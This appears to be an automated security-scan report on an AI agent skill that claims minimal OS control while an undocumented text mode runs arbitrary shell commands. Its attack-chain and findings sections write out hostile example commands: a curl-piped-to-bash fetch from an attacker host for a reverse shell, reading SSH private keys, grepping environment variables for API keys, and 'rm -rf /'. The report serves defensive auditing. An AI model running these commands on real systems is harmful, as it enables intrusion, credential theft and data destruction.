中文 EN
Start Review
Skill Trust Decision

minimal-agent

Skill declares minimal OS control capabilities but secretly implements unrestricted arbitrary command execution through undocumented V1/text mode, enabling full system compromise.

Install decision first Source: Manual upload Scanned: Apr 4, 2026
Files 3
Artifacts 3
Violations 4
Findings 6
Most direct threat evidence
Critical RCE
Unrestricted Arbitrary Command Execution via V1 Mode

The skill implements a 'V1/text mode' that allows execution of ANY shell command, but this is not declared in allowed-tools. The documentation only mentions 'minimal OS control' with controlled hardware operations, yet the actual code exposes unlimited command execution.

scripts/agent.py:459

Why this conclusion was reached

2/4 dimensions flagged
Block
Declared vs actual capability

4 undeclared or violating capabilities were inferred.

Review
Hidden execution and egress

3 lower-risk artifacts were extracted and still need context.

Block
Attack chain and severe findings

The report includes 7 attack-chain steps and 4 severe findings.

Pass
Dependencies and supply chain hygiene

Dependencies are present but no obvious high-risk issue stands out.

Attack Chain

01
Skill marketed as minimal OS control agent with window management and hardware control

deception · SKILL.md:1

02
V1/text mode documented as 'development/debugging' feature without emphasizing unrestricted command execution

deception · SKILL.md:65

03
Attacker forces V1 mode via --text flag or config mode='force_text'

access · scripts/agent.py:444

04
execute_raw_command() passes arbitrary input to shell=True subprocess

Execution · scripts/agent.py:459

05
Attacker executes: 'curl https://attacker.com/shell.sh | bash' for reverse shell

Impact · scripts/agent.py:459

06
Attacker executes: 'cat ~/.ssh/id_rsa' to steal SSH keys

Impact · scripts/agent.py:459

07
Attacker executes: 'env | grep API' to harvest credentials

Impact · scripts/agent.py:459

What drove the risk score up

Undeclared arbitrary command execution +35

V1/text mode enables ANY shell command not declared in allowed-tools

Doc-to-code capability mismatch +20

Documentation claims minimal OS control but actual code allows full system access

shell=True subprocess execution +15

execute_raw_command() passes user input directly to shell=True

No parameter validation +5

Command parameters passed directly without sanitization

Most important evidence

Critical RCE

Unrestricted Arbitrary Command Execution via V1 Mode

The skill implements a 'V1/text mode' that allows execution of ANY shell command, but this is not declared in allowed-tools. The documentation only mentions 'minimal OS control' with controlled hardware operations, yet the actual code exposes unlimited command execution.

scripts/agent.py:459
Remove V1/text mode entirely or declare it explicitly in allowed-tools with shell:ADMIN level. The function-calling V2 mode with 55 predefined tools should be the only permitted execution path.
Critical Doc Mismatch

Documentation Mismatch: Claims Minimal Control But Enables Full System Access

SKILL.md describes this as a '极简 AI 操作系统控制代理' (minimal AI OS control agent) for window management, process control, hardware operations, GUI automation, serial communication, and IoT control. However, the V1 mode documented in SKILL.md enables unrestricted command execution including: file operations, script execution, network operations, database operations, system management, software installation, and security operations.

SKILL.md:67
Either remove V1 mode entirely or prominently document that this skill can execute arbitrary system commands with full system access.
High RCE

Direct Shell Injection via User Input

The execute_raw_command() function passes user input directly to shell=True without any sanitization or validation. Commands like 'python agent.py --text "rm -rf /"' would execute immediately.

scripts/agent.py:459
Implement strict input validation and allowlisting. If arbitrary command execution is truly needed, use shell=False with explicit command/argument separation.
High Priv Escalation

Undeclared Elevated Permissions

The skill declares filesystem:WRITE and shell:WRITE, but V1 mode actually provides filesystem:ADMIN and shell:ADMIN equivalent capabilities, enabling: user management, service control, registry editing, firewall configuration, software installation/removal.

SKILL.md:87
Declare the actual permission level (ADMIN) for filesystem and shell resources, or remove these dangerous capabilities.
Medium Obfuscation

Python venv Path Hardcoded with User Home Directory

Line 114 hardcodes 'C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe' which could be leveraged for persistence or DLL hijacking attacks.

scripts/agent.py:114
Use relative paths or configurable paths instead of hardcoding absolute paths to user directories.
Medium Credential Theft

Potential Environment Variable Access for API Keys

V1 mode can execute commands like 'env' or 'printenv' to extract API keys, tokens, and other secrets from environment variables. This is not declared in allowed-tools.

scripts/agent.py:459
If environment variable access is needed, explicitly declare it and implement safeguards against exfiltration.

Declared capability vs actual capability

Shell Pass
Declared WRITE
Inferred WRITE
agent.py:run_script() uses subprocess
Filesystem Pass
Declared WRITE
Inferred WRITE
agent.py + V1 mode enables any file operation
Network Block
Declared READ
Inferred READ_WRITE
Database Block
Declared NONE
Inferred WRITE
Environment Block
Declared NONE
Inferred READ
Skill Invoke Block
Declared NONE
Inferred WRITE

Suspicious artifacts and egress

Medium External URL
https://skillhub.tencent.com/skills/system-controller

SKILL.md:262

Medium External URL
https://clawhub.ai/wangjiaocheng/system-controller

SKILL.md:271

Medium External URL
https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip

SKILL.md:275

Dependencies and supply chain

PackageVersionSourceKnown vulnNotes
subprocess stdlib Python No Standard library only
tomllib stdlib Python No Standard library only

File composition

3 files · 1255 lines
Python 1 files · 938 linesMarkdown 1 files · 293 linesTOML 1 files · 24 lines
Files of concern · 2
scripts/agent.py Python · 938 lines
Unrestricted Arbitrary Command Execution via V1 Mode · Direct Shell Injection via User Input · Python venv Path Hardcoded with User Home Directory · Potential Environment Variable Access for API Keys
SKILL.md Markdown · 293 lines
Documentation Mismatch: Claims Minimal Control But Enables Full System Access · Undeclared Elevated Permissions · https://skillhub.tencent.com/skills/system-controller · https://clawhub.ai/wangjiaocheng/system-controller · https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip
Other files · config.toml

Security positives

V2/function-calling mode provides controlled execution with 55 predefined tools
Dangerous operations (power_shutdown, process_kill, network_disable) have confirmation prompts in V2 mode
Configuration allows disabling auto mode fallback to V1
Timeout limits (30s) prevent indefinite command execution